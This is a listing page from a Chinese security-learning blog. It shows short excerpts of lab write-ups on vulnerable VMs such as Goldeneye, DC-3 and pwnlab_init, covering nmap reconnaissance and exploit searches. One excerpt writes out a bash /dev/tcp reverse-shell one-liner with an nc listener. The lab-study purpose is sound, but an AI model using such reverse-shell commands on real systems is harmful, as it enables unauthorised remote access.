zhyann的头像-白鸢的笔记
管理员
这家伙很懒,什么都没有写...
基本操作 1-白鸢的笔记

基本操作 1

gethostname()   返回host namegethostbyname(host) 通过host name得到IP地址packed = socket.inet_aton(ip_addr)   转换成16进制socket.inet.nota(packed)  将转换后的地址转换回来socket...
Golden eye 1.1  part 2-白鸢的笔记

Golden eye 1.1 part 2

我们现在已经登录到了管理员页面 用wappalyzer查看使用的是什么服务 LMS moodle 查询如何查看版本https://www.isharkfly.com/t/moodle/4486 Google查询 moodle 2.2.3 exploit发现可以使用 e...
1年前
04710
Goldeneye 1.1-白鸢的笔记

Goldeneye 1.1

实验环境攻击者 Kali 192.168.192.128受害者 Goldeneye1.1 IP未知攻击者和受害者在同一网段 1. 信息收集nmap -sn 192.168.192.0/24受害者IP为192.168.192.164收集受害者服务详情nmap -sV -A 19...
1年前
07411
mrRoot-白鸢的笔记

mrRoot

实验环境攻击者 Kali 192.168.192.128受害者 mrRoot IP未知攻击者和受害者在同一网段 1. 信息收集nmap -sn 192.168.192.0/24 收集受害者服务详情nmap -sV -A 192.168.192.16122/tcp closed ss...
1年前
05114
pwnlab_init-白鸢的笔记

pwnlab_init

实验环境攻击者 Kali 192.168.192.128受害者 pwnlab_init IP未知攻击者和受害者在同一网段 1. 信息收集nmap -sn 192.168.192.0/24受害者IP为 192.168.192.160 收集受害者服务详情nmap -sV -A ...
1年前
07812
sickos 1.1-白鸢的笔记

sickos 1.1

实验环境攻击者 Kali 192.168.192.128受害者 sickos1.1 IP未知攻击者和受害者在同一网段 1. 信息收集nmap -sn 192.168.192.0/24受害者IP为 192.168.192.159 收集受害者服务详情nmap -sV -A 19...
1年前
0507
DC-4-白鸢的笔记

DC-4

实验环境攻击者 Kali 192.168.192.128受害者 DC-3 IP未知攻击者和受害者在同一网段 1. 信息收集nmap -sn 192.168.192.0/24受害者IP为 192.168.192.156 收集受害者服务详情nmap -sV -A 192.168...
1年前
0638
交互式shell和稳定shell的建立-白鸢的笔记

交互式shell和稳定shell的建立

1. python方式建立交互式shell攻击者先监听nc -lvnp 监听端口 受害者bash -c 'bash -i >& /dev/tcp/攻击者ip/攻击者端口 0>&1'再攻击者端就能得到shell 如果有python 可以使用...
1年前
07614
DC-3 补充-白鸢的笔记

DC-3 补充

我们检查一下网络root@DC-3:/tmp/ebpf_mapfd_doubleput_exploit# netstat -anltp Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address ...
1年前
04115
DC-3-白鸢的笔记

DC-3

实验环境攻击者 Kali 192.168.192.128受害者 DC-3 IP未知攻击者和受害者在同一网段 1. 信息收集nmap -sn 192.168.192.0/24受害者IP为 192.168.192.155 收集受害者服务详情nmap -sV -A 192.168...
1年前
05614